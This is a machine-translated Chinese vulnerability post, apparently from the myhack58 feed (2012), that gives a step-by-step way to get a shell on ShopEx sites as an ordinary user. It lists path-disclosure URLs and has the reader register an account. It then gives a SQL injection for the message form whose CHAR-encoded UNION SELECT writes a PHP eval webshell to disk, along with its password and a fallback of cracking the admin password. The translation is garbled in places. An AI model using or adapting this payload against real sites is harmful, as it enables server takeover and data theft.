shopex front Desk ordinary users getshell the latest vulnerability-vulnerability warning-the black bar safety net

2012-09-28T00:00:00
ID MYHACK58:62201235056
Type myhack58
Reporter 佚名
Modified 2012-09-28T00:00:00

Description

Use method:

First: think of a way to find the target site's absolute path

http://www.wooyun.in/install/svinfo.php?phpinfo=true

http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_goodstype.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_brand.php

shopex there are many explosive path of vulnerability, self-study.

Second: register a normal user

http://www.wooyun.in/?passport-signup.html

The first three:

To send a message

http://www.wooyun.in/?member-send.html

!

Code

> > tick. in' union select CHAR(6 0, 6 3, 1 1 2, 1 0 4, 1 1 2, 3 2, 6 4, 1 0 1, 1 1 8, 9 7, 1 0 8, 4 0, 3 6, 9 5, 8 0, 7 9, 8 3, 8 4, 9 1, 3 9, 3 5, 3 9, 9 3, 4 1, 5 9, 6 3, 6 2) into outfile 'E:/zkeysoft/www/x.php' # > > Word password is# > > This vulnerability, the mysql user permissions are required, for the export directory needs to be writable by the request, the server environment is also required. > > If you can't getshell, you can also try injecting, breaking the password into the background, too > > shell figure

!